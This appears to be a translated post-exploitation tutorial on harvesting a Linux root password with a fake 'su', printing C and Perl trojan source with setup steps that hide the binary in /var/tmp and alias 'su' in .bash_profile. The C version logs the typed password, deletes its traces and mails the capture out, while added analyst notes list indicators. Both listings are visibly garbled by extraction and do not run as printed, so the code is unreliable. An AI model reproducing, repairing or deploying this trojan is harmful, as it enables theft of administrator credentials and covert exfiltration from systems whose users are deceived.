Once the web backdoor is already running as root (less likely) or has been escalated to the highest privilege through an overflow vulnerability, obtaining the root password itself still brings many benefits. Looking at the methods used by predecessors, one is a fake su that records the password, the other is replacing sshd; we first look at the code of the fake su that records the password.
Look first, kpr-fakesu.c v0.9beta167 fucksu.c
/* * KPR-FAKESU.C v0.9beta167; P * by Koper <[email protected]> * * Setting up: *[email protected]:~$Gcc-o. Su fakesu.c; RM-RF FAKESU.C *[email protected]:~$mv. su/var/tmp/.su *[email protected]:~$CP. Bash_profile. WGETRC * [email protected]:~$echo "Alias su=/var/tmp/.su" >>.bash_profile *[email protected]:~$LOGOUT * * * * LOGIN * *[email protected]:~$ su * Password: * su:authentication failure * Sorry. * [email Protected] : ~$ su * Password: * [ Email protected] : ~# logout * [email protected] : ~$ cat/var/tmp/.pwds * root:dupcia17 * [email protected] : ~$ * */BIN/SU sends various failure information Depending on the OS ver. * Modify the source to make it "fit" * */
#include <stdio.h> #include <stdlib.h>
/* Analyst note (review): credential-harvesting fake `su`, reproduced exactly
 * as the page prints it. The listing is extraction-damaged (case changes such
 * as `Main`/`Char`/`System`, a curly quote in the sleep string, an unbalanced
 * parenthesis and `= NULL` on the fopen line) and does not compile as shown;
 * nothing below has been repaired. Artifacts this source touches, useful as
 * indicators: /var/tmp/.pwds (capture file), /var/tmp/.su (the trojan binary,
 * later a symlink to /bin/su), and /home/admin/.bash_profile restored from
 * /home/admin/.wgetrc. The header comment above shows the hook is a shell
 * alias `su=/var/tmp/.su` in ~/.bash_profile; invoking su by its full path
 * bypasses an alias, and the alias line itself is the simplest thing to check. */
Main (int argc, char *argv[]) {
FILE *FP; Char *user; Char *pass; Char filex[100]; Char clean[100];
/* Capture path and cleanup command are fixed strings; the target user is
 * taken from argv in the same shapes the real su accepts (none -> "root",
 * a bare user, or "-l <user>"). */
sprintf (Filex, "/var/tmp/.pwds"); sprintf (Clean, "rm-rf/var/tmp/.su;mv-f/home/admin/.wgetrc/home/admin/.bash_profile"); if (argc==1) user= "root"; if (argc==2) user=argv[1]; if (argc>2) {if (strcmp (argv[1], "-l") ==0) user=argv[2]; else user=argv[1];}
/* Mimics su: prompts, reads the password with getpass(), pauses via a
 * shell `sleep`, then prints a fake authentication failure so the victim
 * simply retries. Defender view: a `sleep` child spawned from an "su"
 * that is not /bin/su is the behavioural tell here. */
fprintf (stdout, "Password:"); Pass=getpass (""); System ("Sleep 3″"); fprintf (stdout, "su:authentication FAILURENSORRY.N");
/* Writes "<user>:<password>" to /var/tmp/.pwds (opened in "w" mode, so only
 * the latest capture is kept on disk). The condition is printed with an
 * unbalanced parenthesis and `= NULL` — left as-is, see note above. */
if (Fp=fopen (Filex, "w")) = NULL) {fprintf (FP, "%S:%SN", user, pass); fclose (FP);}
/* Self-removal: runs the cleanup string (deletes /var/tmp/.su, puts the
 * original .bash_profile back), then re-creates /var/tmp/.su as a symlink
 * to the real /bin/su so the alias resolves to the genuine binary on the
 * victim's second attempt. A symlink at that path is an indicator on its own. */
System (Clean); System ("RM-RF/VAR/TMP/.SU; Ln-s/bin/su/var/tmp/.su ");
/* If you don ' t want password in your e-mail uncomment this line: */
/* Exfiltration: appends `uname -a` to the capture file and pipes it to
 * `mail` (recipient obfuscated on the page). Outbound mail spawned from an
 * interactive user shell is the network-side signal to alert on. */
System ("Uname-a >>/var/tmp/.pwds; Cat/var/tmp/.pwds | Mail[email protected]");
}
Perl version
Perl version:
#!/usr/bin/perl
# Analyst note (review): Perl variant of the same fake-su password logger,
# kept verbatim. The line below is extraction-mangled: the comment header is
# fused with the statements, variables appear as "$s 1" instead of $s1, and
# HTML NBSP entities are embedded. As printed it does not run unmodified.
# Behaviour visible here: prints the su-style prompt, reads one line from
# STDIN, prints a fake "Sorry", then appends "Password is:<input><date>" to
# /tmp/.pass (opened with ">>", so captures accumulate). Indicator: /tmp/.pass,
# plus an su alias pointing at a script, as the header itself describes.
#################################################################################################### #[email protected] 2006 Su Trojan check so the SU path is correct. # then make alias for Trojan first it reads the pass then exec the real SU.&NBSP;&NBSP;&NBSP;&NBSP;&N bsp; # # Logging to/tmp/.pass # #################################################################################################### print "Password:"; $s 1=<stdin>; print "SORRY.N"; $s 2= "Password is:"; $s 3= ' date +%y-%m-%d '; Open (Users, ">>/tmp/.pass") | | Die (' Could not open file '. $! "); Print users ($s 2, $s 1, $s 3); Close (users);
# Hands off to the real /bin/su so the victim's retry succeeds and nothing
# looks wrong; a script named su that execs /bin/su is the thing to look for.
System ("/bin/su")